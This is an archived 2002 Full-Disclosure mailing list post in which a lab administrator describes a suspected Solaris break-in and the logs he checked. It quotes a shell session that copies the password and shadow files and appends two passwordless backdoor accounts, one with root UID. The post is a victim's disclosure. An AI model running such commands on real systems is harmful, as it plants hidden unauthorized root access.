lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <3d5d13b4.33f6.0@australia.edu>
From: security at australia.edu (security@...tralia.edu)
Subject: more than idle threats I'm afraid

memetic-engineer@...hmail.com wrote:
http://lists.netsys.com/pipermail/full-disclosure/2002-August/001073.html


"#old solaris bug die hard.....something similar, but not quite. Have you audited
your Solstice

#products recently? lit_tty was nothing.
    M^ got lost again
    ( agent.lspitzner.added.to.meme156)
 cp /etc/passwd /etc/.tp;"



 I assumed he was speaking of a variation of this old thing;
> # cp /etc/passwd /etc/.tp;
^Mcp /etc/shadow /etc/.ts;
echo "r:x:0:0:User:/:/sbin/sh" >> /etc/passwd;
echo "re:x:500:1000:daemon:/:/sbin/sh" >> /etc/passwd;
echo "r::10891::::::" >> /etc/shadow;
echo "re::6445::::::" >> /etc/shadow;
: not found
# ^M: not found
# ^M: not found
# ^M: not found
# ^M: not found
# ^M: not found
# who;
rsides    console     WED Aug 15 2002 21:09
^M: not found
# exit;


and after converting the hex saw that it was an exact replica.

    To make a long story short, I woke up yesterday to find this in my home
directory :    

./MeMe156/agent.agency.08.14.02.2348/added .agent.sol


after looking through ;
/var/adm/messages
/var/adm/syslog

to no avail, I used what I thought to be a clever script that logs
auth.notice messages. NOTHING

/var/log/utmp; /var/log/utmpx
/var/log/wtmp; /var/log/wtmpx
/var/log/syslog

nothing. But then /var/log/sulog  showed me this;
SU 03/31 12:52 + pts/0 <userid>-root
 and /var/adm/messages revealed this
Mar 31 12:48:41 ***.***.***.*** unix: rebooting...

almost convenient that it was there at all. If anyone else has any
information remotely related please respond.

I administer a private lab running 2 Sun LX50's involved in active Ionospheric
research and HF analysis.



"In building a machine we are so intent upon our purpose that we forget that
we are investing that machine with creative power...it can overgrow us in an
invisible way...they are the dwelling-places of divine powers that may destroy
us."
-C.G. Jung
  

This message was sent from http://australia.edu
Check out the new international site at http://australia.edu/international

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ